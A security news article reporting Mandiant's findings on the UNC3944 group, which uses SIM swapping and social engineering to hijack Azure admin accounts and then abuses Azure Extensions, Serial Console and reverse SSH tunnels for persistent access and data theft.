Published May 18, 2023
Author: Ash Khan

A cybergang is utilising phishing and SIM swapping attacks to compromise Microsoft Azure admin credentials and get access to VMs.

 

The attackers then utilise the Azure Serial Console to install remote management software and Azure Extensions for covert surveillance.

 

 

According to the online security website, the cybergang known as UNC3944 has been active since at least May 2022. Their campaign tries to collect data from victims by leveraging Microsoft’s cloud computing service.

 

Previously, UNC3944 was credited with creating the security application termination toolkits STONESTOP (loader) and POORTRY (kernel-mode driver).

 

To sign their kernel drivers, the threat actors used stolen Microsoft hardware developer credentials.

 

Azure administrators are switching SIM cards

The Azure administrator’s account is initially accessed using stolen credentials obtained using SMS phishing, a common UNC3944 technique.

 

The attackers call the help desk and impersonate the administrator. Moreover. they then deceive them to deliver an MFA reset code to the target’s phone number via SMS.

 

However, because the attacker had previously SIM-swapped and copied the administrator’s number to their device, they obtained the 2FA token without the victim being aware of the breach.

 

The cyber security website is still investigating how the hackers carry out the SIM-changing part of their operation. Previous examples demonstrated that having the victim’s number and cooperating with dishonest telecom staff is sufficient for illegal number porting.

 

Once the attackers have gained access to the targeted organization’s Azure infrastructure, they utilise their administrator credentials to gather information. Furthermore, they alter existing Azure accounts and create new ones as needed.

Techniques for Living Off the Land

In the following assault phase, UNC3944 employs Azure Extensions to perform surveillance and intelligence gathering, disguise its harmful activities as seemingly harmless everyday routines, and blend in with normal activity.

 

Azure Extensions are “add-on” features and services. They can be added to an Azure Virtual Machine to assist increase capabilities, automate operations, and so on. These extensions are discreet and less suspicious because they run within the VM and are often utilised for legal purposes.

 

In this case, the threat actor used built-in Azure diagnostic extensions, such as “CollectGuestLogs,” to gather log files from the infected endpoint.

 

Intruding VMs to steal data

UNC3944 then employs Azure Serial Console to acquire administrator console access to VMs and execute commands over the serial port.

 

The security service website noted this method of attack was unique. Moreover, it avoided many of the traditional detection methods employed within Azure and provided the attacker with full administrative access to the VM. 

Also, hackers use the command “whoami” to identify the presently logged-in user and obtain enough information to continue the exploitation.

 

The reports appendix has more information on how to analyse logs for Azure Serial Console.

 

The hackers then utilise PowerShell to extend their persistence on the VM and install different commercially accessible remote administrator tools.

According to Mandiant’s research, to maintain a presence on the VM, the attacker deploys commercially available remote administration tools via PowerShell.

These tools provide covert remote access without triggering endpoint detection alerts due to their legitimate signatures.

UNC3944’s next move is to establish a reverse SSH tunnel to their C2 server to retain covert and permanent access through a secure channel while bypassing network limits and security constraints.

 

The attacker configures the reverse tunnel using port forwarding, allowing the attacker to log in directly to the Azure VM. Any incoming connection to distant machine port 12345, for example, would be routed to local host port 3389.

Finally, attackers exploit the reverse shell to login to the hacked Azure VM using the credentials of a stolen user account. They then proceed to increase their authority within the penetrated environment while stealing data.

 

To sum up

The assault provided by Mandiant reveals UNC3944’s strong awareness of the Azure ecosystem and how they may use built-in capabilities to avoid detection.

 

When this knowledge is paired with high-level social engineering abilities that assist attackers in SIM switching, the risk is amplified.

 

Organisations with insufficient security solutions, such as SMS-based MFA, allow these sophisticated cyberattacks because of limited understanding of cloud technology.